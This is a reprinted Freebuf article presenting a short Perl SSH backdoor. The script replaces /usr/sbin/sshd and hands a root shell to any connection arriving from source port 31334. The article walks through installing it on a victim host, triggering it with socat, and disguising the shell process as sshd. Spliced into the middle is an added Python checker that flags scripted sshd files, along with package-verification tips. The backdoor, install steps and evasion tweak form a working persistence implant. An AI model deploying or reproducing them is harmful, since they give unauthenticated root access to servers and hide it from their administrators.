Short and exquisite SSH backdoors

Source: Internet
Author: User
Tags: perl, script


sshd backdoor source code:

#!/usr/bin/perl
exec"/bin/sh"if(getpeername(STDIN)=~/^..zf/);
exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;

What this code does:

First line: if the current STDIN file handle is a socket and the remote end's source port is 31334, run /bin/sh and stop there (the second line is never reached). getpeername returns the packed peer address; its first two bytes (the address family) are skipped by the `..` in the regex, and the port 31334 in big-endian network byte order is the two bytes 0x7a 0x66, i.e. the ASCII string "zf", so /^..zf/ matches exactly that source port. Because sshd runs as root, this hands a root shell to the remote socket (in practice the line is only triggered when the attacker deliberately sets the source port of the connection).

Second line: start the real sshd (/usr/bin/sshd), passing along the arguments that were given to /usr/sbin/sshd (the backdoor). This keeps the ssh service working normally for ordinary users, so nothing looks unusual at login.
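As an added defensive check (not part of the original article), the following Python classifies an sshd file on disk as a compiled ELF executable or a #! interpreter script, since the technique above depends on swapping the real binary for a Perl script, and it confirms the byte-order claim: port 31334 packed in network order is exactly the two bytes "zf" that the regex expects. The function names, the default path and the sample bytes are assumptions constructed for this example.

```python
"""Flag an sshd that is an interpreter script instead of the real ELF binary."""
import re
import struct
from pathlib import Path

ELF_MAGIC = b"\x7fELF"
# Patterns from the script shown above: a peek at the peer socket and an exec
# of a shell. Checked only in non-ELF files, because a genuine sshd binary
# also imports getpeername() and would match the first pattern as a string.
SCRIPT_MARKERS = (
    re.compile(rb"getpeername\s*\(\s*STDIN\s*\)"),
    re.compile(rb'exec\s*\(?\s*"/bin/'),
)


def port_in_sockaddr(port: int) -> bytes:
    """Port as it sits in a packed sockaddr_in: 16 bits, network byte order."""
    return struct.pack("!H", port)


def classify(data: bytes) -> str:
    """'elf' for a compiled executable, 'script' for a #! interpreter file."""
    if data.startswith(ELF_MAGIC):
        return "elf"
    if data.startswith(b"#!"):
        return "script"
    return "unknown"


def inspect_sshd_bytes(data: bytes) -> dict:
    """Verdict for file contents: anything that is not ELF is suspicious."""
    kind = classify(data)
    markers = []
    if kind != "elf":
        markers = [m.pattern.decode() for m in SCRIPT_MARKERS if m.search(data)]
    return {"kind": kind, "markers": markers, "suspicious": kind != "elf"}


def inspect_sshd_file(path: str = "/usr/sbin/sshd") -> dict:
    """Run the same check on a file on disk (default: the path the article replaces)."""
    return inspect_sshd_bytes(Path(path).read_bytes())


if __name__ == "__main__":
    # Constructed sample of a scripted sshd, not read from any real host.
    sample = b'#!/usr/bin/perl\nexec "/bin/sh" if (getpeername(STDIN) =~ /^..zf/);\n'
    print(inspect_sshd_bytes(sample))
    # The two port bytes the regex ..zf expects: 31334 in network byte order.
    print(port_in_sockaddr(31334))  # b'zf'
```

On a live host, also compare the file against the package manager's recorded checksum (e.g. `dpkg -V openssh-server` or `rpm -V openssh-server`) and look for a second sshd copy outside its packaged path, as in the /usr/bin/sshd move described below.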

How the backdoor is used

Controlled end (victim): 10.1.100.3, Kali

Control end: 10.1.100.2, CentOS 7

1) On the controlled end:

Move the real sshd to /usr/bin/sshd:

mv /usr/sbin/sshd /usr/bin/sshd


Place the backdoor sshd (the perl script) at /usr/sbin/sshd and make it executable:

chmod +x /usr/sbin/sshd


Restart the ssh service:

/etc/init.d/ssh restart


2) On the control end:

socat STDIO TCP4:10.1.100.3:22,sourceport=31334


This command redirects stdin and stdout to a socket connected to 10.1.100.3:22 (so STDIN of the backdoor perl script is that socket) and sets the socket's source port to 31334.

It is equivalent to: socat - TCP4:10.1.100.3:22,sourceport=31334

No authentication is required, because the root shell is handed over before sshd's authentication stage is ever reached.

Connection status on the controlled end:

On port 22 there is a connection between sh and the control end, and the program name shows as sh rather than the normal sshd. To make this less conspicuous, copy /bin/sh to /bin/sshd and change the backdoor source to:

#!/usr/bin/perl
exec"/bin/sshd"if(getpeername(STDIN)=~/^..zf/);
exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;

Connect from the control end again:

Now the process shows up as sshd, which is far more convincing!


This article is reprinted from Freebuf: http://www.freebuf.com/articles/system/140880.html
